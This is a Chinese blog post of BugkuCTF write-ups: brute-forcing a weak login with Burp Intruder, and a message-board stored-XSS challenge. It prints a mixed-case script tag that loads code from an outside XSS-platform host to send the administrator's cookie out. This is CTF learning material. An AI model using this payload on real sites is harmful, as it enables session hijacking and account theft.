bugkuCTF

已于 2022-11-06 14:21:12 修改
阅读量478 收藏 1
点赞数 1
分类专栏: CTF 文章标签: 网络安全
于 2022-10-26 15:44:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52062236/article/details/127533527
版权

有时间再说,持续更新

bp

提示:弱密码top1000?z???
在这里插入图片描述
首先,burpsuite—>Intruder—>Sniper爆破该密码,发现包长度都一致,爆破不成功。根据题目提示,字典应该是没有问题的,所以不考虑这个可能。

然后,查看返回包,显然如果密码正确,r.code的值就不会是bugku10000,根据返回包长度都一致,可以推断,r.code的值为10位

<script>
  var r = {code: 'bugku10000'}
  if(r.code == 'bugku10000'){
  	console.log('e');
	document.getElementById('d').innerHTML = "Wrong account or password!";
  }else{
      console.log('0');
      window.location.href = 'success.php?code='+r.code;
  }
</script>

下面需要做的就是过滤掉响应内容为{code: 'bugku10000'}的包
Burp-Intruder-options-Grep match加上这个内容即可。

留言板

xss平台直接搞个payload放进去,然后管理员会自己访问,cookie就传过来了,看样子是把()过滤成||,不用window.open()就好了。我用的payload:<sCRiPt sRC=//0x.ax/jP7G></sCrIpT>

在这里插入图片描述

Vin0sen
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugku web方向所有题解
kekefen01的博客
04-18 3095
第一题F12,第二题打开js文件,第三题 get参数 第四题转换成post请求最后空一行加入what=flag 注意最后不能加回车,不然会把what的值认为是"flag\n" 可以转换post加入参数,再转成get再转换成post 第五题php弱类型 num=1df 随便什么,反正$num==1都能通过 $num=$_GET['num']; if(!is_numeric($num)) { ech...
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
BUGKU-WEB 留言板1
天泽岁月
02-18 1200
BUGKU-WEB 留言板1,xss双写绕过
Bugku-web-留言板
qq_68457525的博客
06-20 310
ctf中关于xss跨站脚本漏洞的学习
bugku-web-留言板
m0_57954651的博客
10-31 4825
获取cookie的js代码 (alert(document.cookie))
Bugku-留言板
qq_56611811的博客
05-07 728
1.提示我们用xss平台接收flag2.通过xss.pt平台生成脚本,以插入图片形式将图片地址上传 3.回到xss平台可以看到接收到flag4.URL解码一下,拿到flag
BUGKU 留言板
热门推荐
qq_56313338的博客
07-22 2万+
bugku 留言板的解题思路 web
ctf bugku
weixin_51387754的博客
08-13 1935
bugkuSimple_SSTI_1社工-进阶收集Simple_SSTI_2Flask_FileUpload1和0的故事easy_nbt留言板瑞士军刀入门逆向滑稽canarytelnet眼见非实啊哒/.-聪明的小羊ok[+-<>] Simple_SSTI_1 查看源码 You need pass in a parameter named flag。 You know, in the flask, We often set a secret_key variable 您需要传入一个名为flag
bugku ctf misc wp.pdf
07-05
bugku ctf misc wp.pdf
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
web留言板
06-06
Web留言板 (0分) 设计一个简单的基于Web的留言板,要求如下:1)系统中所有页面,如果用户没登录,则让用户返回到登录页面login.jsp(说明:login.jsp页面填写用户的用户名和密码);2)留言板(message.jsp)页面中以表格的形式(留言者用户名、留言标题、留言时间)显示出所有的用户留言,点击一个标题后,可以在新页面(showmessage.jsp)中显示留言的内容;3)在留言页面addMessage.jsp可以添加新的留言。留言包括:标题、内容。 说明:(1)采用JSP+JavaBean结构;(2)所有的留言内容需要存储到文件。
CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用,两种方法一道题
最新发布
07-16
### CTF题目 [成绩查询 - Bugku CTF]union注入和sqlmap的入门使用 #### 知识点一:SQL注入基础与Union注入原理 **SQL注入**是一种常见的网络安全攻击方式,通过将恶意SQL代码插入应用程序接收的数据中,进而操纵...
apachecn#apachecn-ctf-wiki#BugkuCTF-WEB解题记录-11-15_weixin_3069946
07-25
BugkuCTF WEB解题记录 11-15_weixin_30699463的博客-CSDN博客来源:
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
【标题】"BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip" 指的是2021年BugKu网络安全平台举办的AWD(Attack-Defend,攻防)CTF(Capture The Flag,夺旗)排位赛的实战题目,其中的"7"可能代表该赛事的第七个...
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-8.zip
12-07
BugKu 2021 CTF AWD 排位赛 真题
bugku-ctf
weixin_53562844的博客
05-05 321
这里我也是试了这个平台的很多url,最后成功的是上面那个,可能是xss平台有些url用不了,又可能是我操作不当,反正多试几个,多试几次。dirsearch进行目录扫描,发现admin.php登录接口,默认用户名admin,但不知道密码,这里我利用不了。因为看到好多人都说没回显,就做一下记录,希望能帮到更多人。直接复制里面的代码,这里过滤空格和script。这里已经看到xss平台有回显了。
【愚公系列】2023年06月 Bugku-Web(留言板
时光隧道
06-23 7016
使用dirsearch进行目录爆破的步骤如下:下载dirsearch工具:可以从Github上下载dirsearch,或者使用命令行工具进行安装。打开dirsearch工具:在命令行中输入python3 dirsearch.py命令,即可打开dirsearch工具。设置目标URL:在命令行中输入目标URL,例如:python3 dirsearch.py -u http://example.com。
CTF| 简易留言板
qq_42646885的博客
07-08 2938
打开网址是个简易留言板,有两个输入框可以输入。 随便输入几个字符提交后,发先提交一条记录返回四个信息。这四个信息中,姓名和内容是由输入内容决定的,其他两个时间和ID是不可控的,时间获取的是当前时间,可能是使用了SQL的now()函数,ID可能是从1自动增长的。 试下注入,输入一个单引号',提示留言失败。在昵称输入两个单引号,留言成功,昵称显示只有一个单引号。这个应该是Insert二次注...
BugkuCTF 字符?正则?
08-11
BugkuCTF 是一个CTF(Capture The Flag)比赛平台,提供了一系列的网络安全挑战题目供参赛者解决。在这个平台上,参赛者需要利用自己的技术和知识,寻找并利用目标系统中的漏洞,获取相应的flag来得分。 关于字符和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值